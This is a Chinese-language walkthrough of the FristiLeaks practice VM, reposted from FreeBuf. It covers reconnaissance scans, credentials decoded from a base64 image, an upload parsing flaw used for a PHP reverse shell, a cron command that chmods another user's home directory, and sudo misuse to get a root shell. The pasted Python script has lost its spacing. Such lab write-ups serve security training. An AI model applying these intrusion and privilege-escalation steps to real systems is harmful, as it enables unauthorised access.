靶机搭建

打开镜像，网络模式net,MAC地址08:00:27:A5:A6:76，开启靶机会给出IP地址。

信息收集

1.CMS

searchsploit apache 2.2.15
searchsploit php 5.3.3

php 5.3.3 一大堆漏洞可以后期利用

apache 2.2.15

2.端口扫描

nmap -T4 -A -p- -v 192.168.1.119

3.目录扫描

感觉没啥有用目录。可以将完网站元素作为目录进行尝试访问。

dirsearch -u http://192.168.1.119 -i 200 301

feroxbuster -u http://192.168.1.119 -e -s 200 301

http://192.168.1.119/images/ 图片目录
http://192.168.1.119/robots.txt

渗透

1.尝试网站元素作为目录进行访问

http://192.168.1.119/fristi
图片是个base64加密图片 还给个提示信息:eezeepz

对加密图片进行解密图片格式输出。

base64 -d f.png > fd.png
display fd.png    

kekkekkekkekkEkkEk

2.作为用户名密码登录

eezeepz
kekkekkekkekkEkkEk

上传文件：

图片能够上传成功给出上传路径/uploads

猜解文件路径：

http://192.168.1.119/fristi/uploads/11.jpg

存在解析漏洞

3.利用解析漏洞构造反弹shell

绕过检测：

但是kali监听不到。

用kali自带的webshell:webshell:/usr/share/webshells/php/php-reverse-shell.php

提权

1.查看靶机目录

/home

admin
eezeepz   这个可以打开
fristigod

再eezeepz下的notes.txt发现执行计划命令改变/home/admin权限

再/home目录下执行:
echo "/home/admin/chmod 777 /home/admin" >/tmp/runthis

cryptpass.py

#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
importbase64,codecs,sys

defencodeString(str):
base64string= base64.b64encode(str) #base64加密
returncodecs.encode(base64string[::-1], 'rot13') #对字符进行发转，再进行rot13加密。

cryptoResult=encodeString(sys.argv[1]) #引入外部参数
printcryptoResult

cryptedpass.txt

mVGZ3O3omkJLmy2pcuTq 解密：thisisalsopw123

whoisyourgodnow.txt

=RFn0AKnlMHMPIzpyuTI0ITG 解密：LetThereBeFristi!

解密脚本：

2.切换admin用户

密码：thisisalsopw123

sudo -l
admin 用户sudo可以执行的命令

find / -perm -u=s -type f 2>/dev/null
admin用户没可利用的SUID权限位且属主为root的文件

3.切换fristigod用户

密码：LetThereBeFristi!

sudo -l  查看可利用root命令

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
生成bash

flag:

总结：

• 当获取的端口,cms,目录信息少的时候尝试利用网页元素。

• 善于收集中间件，数据库，mysql版本漏洞

• 基本py脚本的使用

• sudo -l 查看当前用户sudo可以执行的命令

• 利用sudo 可执行的命令生成bash

本文作者：翻斗花园大图图， 转载请注明来自FreeBuf.COM

---

关 注 有 礼

欢迎关注公众号：网络安全者

后台回复：20221114

获取每日抽奖送书

       

本文内容来自网络，如有侵权请联系删除

原文始发于微信公众号（网络安全者）：FristLeak渗透